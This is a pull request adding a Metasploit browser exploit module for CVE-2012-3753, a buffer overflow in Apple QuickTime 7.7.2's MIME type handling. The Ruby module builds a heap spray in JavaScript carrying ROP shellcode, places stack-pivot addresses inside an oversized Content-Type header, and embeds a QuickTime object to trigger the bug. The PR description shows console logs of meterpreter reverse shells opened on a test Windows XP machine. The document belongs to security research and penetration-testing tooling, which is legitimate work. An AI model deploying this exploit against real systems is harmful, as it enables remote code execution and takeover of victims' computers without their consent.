### PR TITLE
Added module for cve-2012-3753

### DIFF
--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -1,0 +1,238 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::Egghunter
+	include Msf::Exploit::RopDb
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({
+		:os_name    => OperatingSystems::WINDOWS,
+		:ua_name    => HttpClients::SAFARI,
+		:ua_maxver  => '5.0.1',
+		:ua_maxver  => '5.1.7',
+		:javascript => true,
+		:rank       => NormalRanking, # reliable memory corruption
+		:vuln_test  => nil
+	})
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack
+				based overflow occurs when processing a malformed Content-Type header. The module
+				has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.
+			},
+			'Author'         =>
+				[
+					'Pavel Polischouk', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2012-3753' ],
+					[ 'OSVDB', '87088'],
+					[ 'BID', '56438' ],
+					[ 'URL', 'http://support.apple.com/kb/HT5581' ],
+					[ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'        =>
+				{
+					'BadChars' => "",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+				},
+			'Platform' => 'win',
+			'Targets'  =>
+				[
+					# Tested with QuickTime 7.7.2
+					[ 'Automatic', {} ],
+					[ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',
+						{
+							'OffsetFirstStackPivot' => 389,
+							'OffsetSecondStackPivot' => 105,
+							'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
+							'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
+							'SprayOffset' => 264,
+							'SprayedAddress' => 0x60130124
+						}
+					],
+					[ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',
+						{
+							'OffsetFirstStackPivot' => 389,
+							'OffsetSecondStackPivot' => 105,
+							'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
+							'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
+							'SprayOffset' => 264,
+							'SprayedAddress' => 0x60130124
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Nov 07 2012',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+			], self.class
+		)
+	end
+
+	def get_target(agent)
+		#If the user is already specified by the user, we'll just use that
+		return target if target.name != 'Automatic'
+
+		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+
+		browser_name = ""
+		if agent =~ /Safari/ and agent=~ /Version\/5\.1\.7/
+			browser_name = "Safari 5.1.7"
+		elsif agent =~ /Safari/ and agent=~ /Version\/5\.0\.5/
+			browser_name = "Safari 5.0.5"
+		end
+
+		case nt
+			when '5.1'
+				os_name = 'Windows XP SP3'
+			when '6.0'
+				os_name = 'Windows Vista'
+			when '6.1'
+				os_name = 'Windows 7'
+		end
+
+		targets.each do |t|
+			if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
+				print_status("Target selected as: #{t.name}")
+				return t
+			end
+		end
+
+		return nil
+	end
+
+	def on_request_uri(client, request)
+
+		agent = request.headers['User-Agent']
+		my_target = get_target(agent)
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("Browser not supported: #{agent}")
+			send_not_found(cli)
+			return
+		end
+
+		return if ((p = regenerate_payload(client)) == nil)
+
+		if request.uri =~ /\.smil$/
+			print_status("Sending exploit (target: #{my_target.name})")
+			smil = rand_text_alpha(20)
+			type = rand_text_alpha_lower(1)
+			subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])
+			subtype << [my_target['SecondStackPivot']].pack("V")
+			subtype << [my_target['SprayedAddress']].pack("V")
+			subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)
+			subtype << rand_text_alpha_lower(4)
+			subtype << [my_target['FirstStackPivot']].pack("V")
+			subtype << rand_text_alpha_lower(10000 - subtype.length)
+			send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" })
+		else
+			print_status("Sending initial HTML")
+			url =  ((datastore['SSL']) ? "https://" : "http://")
+			url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+			url << ":" + datastore['SRVPORT'].to_s
+			url << get_resource
+			fname = rand_text_alphanumeric(4)
+
+			code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
+			js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
+			offset = rand_text(my_target['SprayOffset'])
+			js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))
+			fill = rand_text(4)
+			js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))
+
+			# Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html
+			js = <<-JSSPRAY
+function heapSpray(offset, shellcode, fillsled) {
+	var chunk_size, headersize, fillsled_len, code;
+	var i, codewithnum;
+	chunk_size = 0x40000;
+	headersize = 0x10;
+	fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);
+	while (fillsled.length <fillsled_len)
+		fillsled += fillsled;
+	fillsled = fillsled.substring(0, fillsled_len);
+	code = offset + shellcode + fillsled;
+	heap_chunks = new Array();
+	for (i = 0; i<1000; i++)
+	{
+		codewithnum = "HERE" + code;
+		heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
+	}
+}
+var myoffset = unescape("#{js_offset}");
+var myshellcode = unescape("#{js_code}");
+var myfillsled = unescape("#{js_fill}");
+heapSpray(myoffset,myshellcode,myfillsled);
+			JSSPRAY
+
+			if datastore['OBFUSCATE']
+				js = ::Rex::Exploitation::JSObfu.new(js)
+				js.obfuscate
+			end
+
+			content =  "<html>"
+			content << "<head><script>"
+			content << "#{js}"
+			content << "</script></head>"
+			content << "<body>"
+			content << <<-ENDEMBED
+<OBJECT
+CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
+WIDTH="1"
+HEIGHT="1"
+CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
+<PARAM name="SRC"        VALUE = "#{url}/#{fname}.smil">
+<PARAM name="QTSRC"      VALUE = "#{url}/#{fname}.smil">
+<PARAM name="AUTOPLAY"   VALUE = "true"               >
+<PARAM name="TYPE"       VALUE = "video/quicktime"    >
+<PARAM name="TARGET"     VALUE = "myself"             >
+<EMBED
+	SRC        = "#{url}/#{fname}.smil"
+	QTSRC      = "#{url}/#{fname}.smil"
+	TARGET     = "myself"
+	WIDTH      = "1"
+	HEIGHT     = "1"
+	AUTOPLAY   = "true"
+	PLUGIN     = "quicktimeplugin"
+	TYPE       = "video/quicktime"
+	CACHE      = "false"
+	PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
+</EMBED>
+</OBJECT>
+			ENDEMBED
+			content << "</body></html>"
+			send_response(client, content, { 'Content-Type' => "text/html" })
+		end
+
+		# Handle the payload
+		handler(client)
+	end
+
+end


### PR DESCRIPTION
- Tested successfully on Windows XP SP3 / Quicktime 7.7.2 with:
- Safari 5.0.5: exploits safari.exe => works pretty reliable in my tests
- Safari 5.1.7: exploits WebKit2WebProcess.exe => works pretty reliable in the first try in my tests, if something fails, even when Webkit2WebProcess will recover automatically it won't work reliable
- Feedback about the spray results on safari is welcome

<pre>
msf  exploit(apple_quicktime_mime_type) > show options

Module options (exploit/windows/browser/apple_quicktime_mime_type):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   true             no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.129    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(apple_quicktime_mime_type) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.129:4444 
[*] Using URL: http://0.0.0.0:8080/vaU4UW
[*]  Local IP: http://192.168.1.129:8080/vaU4UW
[*] Server started.
msf  exploit(apple_quicktime_mime_type) > [*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending initial HTML
[*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending exploit (target: Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2)
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 4 opened (192.168.1.129:4444 -> 192.168.1.140:1582) at 2012-11-27 12:00:49 +0100
[*] Session ID 4 (192.168.1.129:4444 -> 192.168.1.140:1582) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: Safari.exe (816)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2096
[+] Successfully migrated to process 
[*] 192.168.1.140 - Meterpreter session 4 closed.  Reason: Died

msf  exploit(apple_quicktime_mime_type) > 
[*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending initial HTML
[*] 192.168.1.140    apple_quicktime_mime_type - Target selected as: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2
[*] 192.168.1.140    apple_quicktime_mime_type - Sending exploit (target: Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2)
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 5 opened (192.168.1.129:4444 -> 192.168.1.140:4009) at 2012-11-27 12:02:58 +0100
[*] Session ID 5 (192.168.1.129:4444 -> 192.168.1.140:4009) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: WebKit2WebProcess.exe (2624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 284
[+] Successfully migrated to process 

msf  exploit(apple_quicktime_mime_type) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : MSFWORK2
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(apple_quicktime_mime_type) > exit -y

[*] Server stopped.
</pre>
